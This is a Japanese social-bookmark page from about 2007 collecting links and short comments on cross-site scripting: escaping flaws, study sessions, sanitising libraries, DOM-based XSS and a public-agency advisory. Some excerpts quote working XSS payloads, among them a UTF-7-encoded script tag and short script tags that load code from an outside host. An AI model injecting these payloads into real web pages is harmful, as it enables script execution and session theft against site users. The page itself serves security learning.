タグ

xssに関するpoolmmjpのブックマーク (16)

  • TwitterのXSS対策は変だ: Twitterのクロスサイト・スクリプティング(XSS)対策は変だ - 徳丸浩の日記(2007-08-29)

    _ Twitterのクロスサイト・スクリプティング(XSS)対策は変だ Twitterが流行している。私もヘビーユーザとは言えないものの、結構愛用している(http://twitter.com/ockeghem)。このTwitterのXSS対策が変だなと思う事象があったので報告する。 あらかじめお断りしておくが、TwitterにXSS脆弱性がある(実際にはあったようだが)という報告ではなく、対策の方法がおかしいという報告である。 まずは、どうも変だと思うようになった事例を紹介する。 事例1 モバイル版の二重エスケイプ 私は主に、通勤などの移動中に、W-Zero3で閲覧・書き込みしている。モバイル版(http://m.twitter.com/)を主に利用しているが、「<」などの記号が二重にエスケープされていることに気がついた。 twitter.comでの表示 m.twitter.comでの表

    poolmmjp
    poolmmjp 2007/09/02
    ほんとだー。やっぱエスケープをセキュリティ的な対策だと思ってちゃダメよね。
  • ぼくはまちちゃん!(Hatena) - Port801 (初心者向け)セキュリティ勉強会 Hamachiya2編

    こんにちはこんにちは!! 先日、Twitterで声をかけてもらって、 第一回 Port801 セキュリティ勉強会っていうのに参加してきたよ!! (↑pw: security) そこで、すこし喋った時のビデオを頂いたので、もったいないので公開しちゃいますね! プレゼンだとかそういうの慣れてなくて、ぐだぐだな感じだけど、 よかったら何かの参考にしたり、晩ご飯のおかずにしてください>< Port801 セキュリティ勉強会 - Hamachiya2 その1 (http編) Port801 セキュリティ勉強会 - Hamachiya2 その2 (CSRF編1) Port801 セキュリティ勉強会 - Hamachiya2 その3 (CSRF編2) Port801 セキュリティ勉強会 - Hamachiya2 その4 (XSS編1) Port801 セキュリティ勉強会 - Hamachiya2 その5

    ぼくはまちちゃん!(Hatena) - Port801 (初心者向け)セキュリティ勉強会 Hamachiya2編
  • はてなダイアリー日記 - 自分のはてなダイアリーにブログパーツを設置できるようになりました

    はてなダイアリーのヘッダ、フッタ、文にて一部のscriptタグやobjectタグなどを使用可能にし、ブログパーツやブログアクセサリー等をご自分のダイアリーへ設置できるようになりました。これまではセキュリティ上の問題からscriptタグやobjectタグを貼ることができませんでしたが、はてなが許可したものについてはタグを直接貼ることができます。 今回対応したのは以下4つのブログパーツです。 Yahoo!ニュース - トピックスブログパーツ Yahoo!天気情報 - ブログパーツ Google AdSense Google Gadgets ブログパーツを設置するには、それぞれ上記のリンクよりブログパーツ用のコードを取得後、ご自分のはてなダイアリー管理ツールの詳細デザイン設定よりヘッダやフッタの任意の場所にコピーして設置してください。記事の文にも貼り付けることができます。 基的に各ブロ

    はてなダイアリー日記 - 自分のはてなダイアリーにブログパーツを設置できるようになりました
    poolmmjp
    poolmmjp 2007/08/14
    許可されてたやつだけを貼れるようになったのか...ってGoogleGadgetsが貼れるの!?なんでもアリだ。iframeに入るんだろうからxssの心配もないのか。フィッシングサイトは作れるかも知れない。
  • 被はてなブックマーク画像表示ページにXSS攻撃してみる。 - ぎじゅっやさん

    poolmmjp
    poolmmjp 2007/05/08
    よくわからんよ。
  • Googleトークのすてきなところ - ぼくはまちちゃん!

    ↓marqueeタグが使える! ↓scriptが使える! Googleトークの隠し機能を使いこなして、自由度は無限大だね! すてき! ※alertのタイトルがMicrosoft Internet Explorerなのは、GoogleTalkがIEコンポーネント(?)つかってるからだよ!たぶん!

    Googleトークのすてきなところ - ぼくはまちちゃん!
  • T.Teradaの日記 - SessionSafe: Implementing XSS Immune Session Handling

    SessionSafeは、ハンブルグ大学のMartin Johnsさんが書いたWeb APの方式案です。 もしWeb APにXSS脆弱性があって、これが攻撃されたとしても、 セッションIDが盗まれない 当該ページ以外の情報が窃取・改竄されない ことを目指しています。 面白いなーと思ったので、内容について少し書きます。 なお、元記事を高速斜め読みしたので、この日記の内容には間違いが含まれているかもしれません。興味のある方は原を見てください。 セッションIDが盗まれない 以下の二つのドメインがあるとします。 www.example.com secure.example.com セッションIDのCookieは、secureサブドメインに発行します。 Webページを表示する際はwww.example.comのURLにアクセスします。そこで返すHTMLに色々と仕掛けを施します。 HTMLの仕掛け

    T.Teradaの日記 - SessionSafe: Implementing XSS Immune Session Handling
    poolmmjp
    poolmmjp 2007/03/23
    『もしWeb APにXSS脆弱性があって、これが攻撃されたとしても、1. セッションIDが盗まれない 2. 当該ページ以外の情報が窃取・改竄されない ことを目指しています。』とのこと。原文含めてあとでちゃんと読む。
  • HTMLを許可しつつXSS対策を行えるPHPライブラリ「HTML Purifier」:phpspot開発日誌

    HTML Purifier - Filter your HTML the standards-compliant way! HTML Purifier is a standards-compliant HTML filter library written in PHP. HTMLを許可しつつXSS対策を行えるPHPライブラリ「HTML Purifier」。 HTMLをちゃんとパースして、XSSに関わる問題のあるタグなどは除去して返してくれます。 例えば、次のコードが(Before)、 phpspot <a href="hogehoge" onclick="alert('test1');">hogehoge</a> <script type="text/javascript"> <!-- alert("test2"); --> </script> 次のコードのようにクリーンになります。(A

    poolmmjp
    poolmmjp 2007/03/19
    後にこのライブラリに脆弱性が見つかったら怖い
  • 第4回 JavaScript実行制御で情報漏えいを防ぐ

    Web 2.0という言葉で総称される新たなインターネット時代。Webサイトやエンドユーザーに仕掛けられる攻撃もまた,2.0と呼ぶべき進化を遂げようとしている。攻撃者はWeb 2.0の中核技術であるJavaScriptを悪用してブラウザを狙う。従来の脅威対策は全く通用しない。今回はユーザーが今すぐ実践可能な対策を解説する。 XSS対策は,Webサイトとクライアント(ブラウザ)の両方からのアプローチが考えられる(図5)。Webサイトに潜むXSSのぜい弱性を根絶することと,ブラウザの設定変更や機能拡張によってエンドユーザーが自衛手段を講じることである。 そもそもWebサーバー側にXSSのぜい弱性がなければ,攻撃されるリスクはぐっと小さくなり,クライアント側の対策は必要最低限で済むはず。にもかかわらず専門家はクライアント側の対策を積極的に勧める。サイト側の対策にはどうしても漏れが生じがちなためであ

    第4回 JavaScript実行制御で情報漏えいを防ぐ
    poolmmjp
    poolmmjp 2007/03/15
    「クッキーを無効にしておけば(略)自分になりすまされる危険は回避できる」<なりすまされても困らないサイトでしか無効にできなくない?実際に著者は実施してるの?信頼済みサイトの使い方を紹介してるのは良。
  • 第3回 Web 2.0で事態が悪化

    前回ではWeb 2.0の興隆とともに,JavaScriptが多用され,使用をできないようにするととたんに,Webが使い物にならなくなる現状が,脅威を生んでいることを示した。今回は,RSSといった新しい技術や,ユーザーからの情報公開といったWeb 2.0の特徴がさらに火に油を注ぐことになることを示す。 RSS,ATOMのリーダー・ソフトなど新しいアプリケーションの台頭は,ブラウザ以外にもJavaScript実行環境が増えることにほかならない。 RSSやATOMのリーダー・ソフトは来,最新情報のリストを表示するための仕組み。JavaScriptを解釈する必要はない。しかし多くが,Internet Explorerなど既存のソフトのコンポーネントを使用してリストを表示しているため,JavaScriptを解釈してしまうケースがある。 実際,無償で配布されているRSSリーダーのいくつかでXSSのぜ

    第3回 Web 2.0で事態が悪化
    poolmmjp
    poolmmjp 2007/03/14
    「:」「;」をサニタイジング?やっぱりよくわかってないで書いてるのでは?
  • 第2回 Webブラウザが乗っ取られ,犯罪者の支配下に

    Web 2.0という言葉で総称される新たなインターネット時代。Webサイトやエンドユーザーに仕掛けられる攻撃もまた,2.0と呼ぶべき進化を遂げようとしている。攻撃者はWeb 2.0の中核技術であるJavaScriptを悪用してブラウザを狙う。第2回目となる今回は,今そこにある危機に迫る。 Zone-Hの場合,犯人は自己顕示を目的としていたため,被害はページ改ざん程度で済んだ。しかし,犯罪者の狙い次第で危険度はもっと高まる(図3)。 図3●XSSのぜい弱性を突くことで可能になる攻撃 キー入力の盗難や他サイトへの攻撃などユーザーが知らないうちに,背後での攻撃が可能になる。 [画像のクリックで拡大表示] 例えば銀行や証券会社のWebサイトにXSSの穴があれば,クッキーを盗まれ,不正送金などにつながるかもしれない。盗んだクッキーを使って業務で使用しているWebメールを盗み見られれば,開発や営業の資

    第2回 Webブラウザが乗っ取られ,犯罪者の支配下に
    poolmmjp
    poolmmjp 2007/03/13
    Web2.0時代はブラウザのJSを有効にするから攻撃を回避できないと言いたい?ならば「Web 2.0はぜい弱性の温床を生む」の見出しが変。脆弱性とWeb2.0は関係ない。回避策とWeb2.0が関係あるだけ。
  • 第1回 悪意のJavaScriptで情報が漏えい:ITpro

    Web 2.0という言葉で総称される新たなインターネット時代。Webサイトやエンドユーザーに仕掛けられる攻撃もまた,2.0と呼ぶべき進化を遂げようとしている。攻撃者はWeb 2.0の中核技術であるJavaScriptを悪用してブラウザを狙う。従来の脅威対策は全く通用しない。今この瞬間にも,エンドユーザーは個人情報を盗まれる危険にさらされている。 ブログ/SNSなどユーザー発信型のサイト,Ajax,RSS──。華やかさがクローズアップされるWeb 2.0。ところがその裏側では,エンドユーザーに情報盗難などの危険が広がっている(図1)。インターネット・バンキングやEC(電子商取引)サイトのユーザーIDやパスワード,クレジットカード番号はもちろん,企業内のシステムにアクセスするためのパスワードや,パソコンに読み込んだ機密文書データなど,対象はあらゆる情報だ。 2006年12月末,米国のセキュリテ

    第1回 悪意のJavaScriptで情報が漏えい:ITpro
    poolmmjp
    poolmmjp 2007/03/13
    何度読んでも意味ワカンネ。攻撃者がXSSする際にJSを使うからWeb2.0?一般に昔からXSSにはJSを使うし、脆弱性さえあれば攻撃対象がWeb2.0だとかは関係ない。Web2.0って言いたいだけか?
  • [セキュリティ]Super-Short XSS - T.Teradaの日記

    <p>ココ</p> 上記の ココ に任意の文字列を挿入できる場合、最短で何文字でJavaScriptを起動できるのか? というような話題です(完全にお遊びです)。 http://sla.ckers.org/forum/read.php?2,6964,7145 forumの内容を参考に、手元の環境でやってみると、以下が最短のようです。 ■Firefox2 ①<p><script src=//h4k.in </p> ■IE6 ②<p><script src=//h4k.in/></p> ③<p><script src=//h4k.in></script></p> (h4k.inというのはforum参加者の一人が用意したサイト) forumでは「②はIE7で動く」と書かれていましたが、私がやった限りIE6/7とも動きませんでした。③のように </script> が必要なようです。 ただし、挿入箇

    [セキュリティ]Super-Short XSS - T.Teradaの日記
    poolmmjp
    poolmmjp 2007/02/26
  • あまり知られていない脆弱性:DOM Based XSSにご用心|アークウェブのブログ

    こんにちは、SEの進地です。 XSS(Cross Site Scripting)脆弱性の中であまり注意を払われていないタイプにDOM Based XSSというものがあります。アナウンス自体は随分と昔から行われており、webappsec.orgでも2005/7/4にAmit Klein氏が"DOM Based Cross Site Scripting or XSS of the Third Kind"を発表しています。 Web 2.0的アプリなどでのAjaxの普及でJavaScriptが多用される現在のWeb開発では、DOM Based XSSが入り込む可能性は従来よりも高まっています。そこで、今回はこのDOM Based XSSについて説明しようと思います。 DOM Based XSSとは何か? 一般的にXSS脆弱性と聞いて思い浮かべるのは、攻撃者の悪意ある入力データ(JavaScript

    poolmmjp
    poolmmjp 2007/02/18
    なんだこれ。サーバを通さないとか#以降の文字は云々とか、なんか関係あるの?document.writeするときはエスケープでしょ当然。これが攻撃者視点ってやつなのかな。
  • それ Unicode で

    UTF-7 を使ってスクリプトを記述 +ADw-SCRIPT+AD4-alert(\'XSS\');+ADw-+AC8-SCRIPT+AD4- IE は、文字エンコーディングが不明で UTF-7 っぽい文字列があれば、自動判別で UTF-7 となる。

  • 情報処理推進機構:重要なお知らせ:頁

    1.概要  今般、次の2.a)のIPAセミナー受付フォームにおいて、クロスサイト・スクリプティング(注)のぜい弱性が発見されました。このぜい弱性を悪用された場合、当該フォームにて申し込みをしようとした方のブラウザ上で不正なスクリプトが実行されてしまう可能性がありました。当該脆弱性を確認した時には、当該セミナーは、募集定員(70名)を超えるお申し込みとなっていました。募集を締め切らせていただくとともに、至急同受付フォームを点検し、再発防止策を講ずるため、1月31日午前11時に同受付フォームのページを閉じさせていただきました。  併せて、当該脆弱性が発見された受付フォームのプログラムを共有する他の受付フォームのページについても、点検のためページを閉じさせていただきました。点検の結果、その受付フォームにおいてもクロスサイト・スクリプティングの脆弱性が確認されましたので、改修した上、脆弱性検査を行

    poolmmjp
    poolmmjp 2007/02/02
    はまちちゃんの件
  • Ywcafe.net

    Ywcafe.net This Page Is Under Construction - Coming Soon! Why am I seeing this 'Under Construction' page? Related Searches: Cheap Air Tickets Top Smart Phones fashion trends Healthy Weight Loss Health Insurance Trademark Free Notice Review our Privacy Policy Service Agreement Legal Notice Privacy Policy

    poolmmjp
    poolmmjp 2007/02/02
    後からタイトルにhtmlspecialchars()を含めたようだけど、そんなの関係ない。問題は「フォームからPOSTされる全ての値に対して」の部分でしょ。
  • 1